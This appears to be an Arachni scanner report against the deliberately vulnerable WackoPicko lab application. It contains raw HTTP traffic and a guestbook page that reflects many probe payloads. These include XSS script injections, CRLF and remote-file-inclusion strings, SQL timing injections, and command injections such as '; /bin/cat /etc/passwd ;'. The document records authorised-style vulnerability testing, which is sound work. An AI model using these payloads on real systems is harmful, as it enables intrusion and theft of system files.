      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
comment
name
comment
1
name
arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 72
Content-Type: application/x-www-form-urlencoded

comment=1&name=arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:04 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1801
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt; </p>
		<p class="comment">1</p>
	<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
		<p class="comment">1</p>
	<p> - by arachni_name()&quot;&amp;%1'-;&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;' </p>
		<p class="comment">1</p>
	<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
		<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
	<p> - by arachni_name </p>
		<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
	<p> - by arachni_name </p>
		<p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p>
	<p> - by arachni_name </p>
		<p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
	<p> - by arachni_name </p>
		<p class="comment">1'"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name]]]]]]]]] </p>
		<p class="comment">1<!--</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name#^($!@$)(()))****** </p>
		<p class="comment">1</p>
	<p> - by arachni_name'&quot; </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;!-- </p>
		<p class="comment">1#^($!@$)(()))******</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1]]]]]]]]]</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
#<Arachni::Parser::Nodes::Element:0x007f7ef0b03058>
Type In Action Default inputs Updated inputs
cookie http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
PHPSESSID
decslc8vmakk398sqkq9619t72
PHPSESSID
decslc8vmakk398sqkq9619t72<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.609705 load page
URL http://192.168.0.26/WackoPicko/guestbook.php
1 0.11344 request http://192.168.0.26/WackoPicko/guestbook.php
2 0.115976 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:16 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=ou68pr7mpl2mrmesf8jo9dr9l7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3530
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by &quot; | /bin/cat /etc/passwd | &quot; </p>
		<p class="comment">" ; /bin/cat /etc/passwd ; "</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by  | /bin/cat /etc/passwd |  </p>
		<p class="comment">1</p>
	<p> - by  ; /bin/cat /etc/passwd ;  </p>
		<p class="comment">` /bin/cat /etc/passwd`</p>
	<p> - by arachni_name </p>
		<p class="comment">" && /bin/cat /etc/passwd && "</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ' &amp;&amp; /bin/cat /etc/passwd &amp;&amp; ' </p>
		<p class="comment">1</p>
	<p> - by &quot; ; /bin/cat /etc/passwd ; &quot; </p>
		<p class="comment">" | /bin/cat /etc/passwd | "</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ' | /bin/cat /etc/passwd | ' </p>
		<p class="comment">1</p>
	<p> - by &quot; &amp;&amp; /bin/cat /etc/passwd &amp;&amp; &quot; </p>
		<p class="comment">1</p>
	<p> - by ` /bin/cat /etc/passwd` </p>
		<p class="comment">' | /bin/cat /etc/passwd | '</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;print 28763*4196403# </p>
		<p class="comment">print 28763*4196403;</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';print 28763*4196403# </p>
		<p class="comment">';print 28763*4196403#</p>
	<p> - by arachni_name </p>
		<p class="comment">print 28763*4196403</p>
	<p> - by arachni_name </p>
		<p class="comment">;print 28763*4196403</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by print 28763*4196403 </p>
		<p class="comment">/search.php.</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by print 28763*4196403; </p>
		<p class="comment">1</p>
	<p> - by ;print 28763*4196403 </p>
		<p class="comment">1</p>
	<p> - by arachni_name';.&quot;) </p>
		<p class="comment">1</p>
	<p> - by arachni_name';waitfor delay '0:0:4'--  </p>
		<p class="comment">1</p>
	<p> - by arachni_name' where sleep(4) #  </p>
		<p class="comment">1</p>
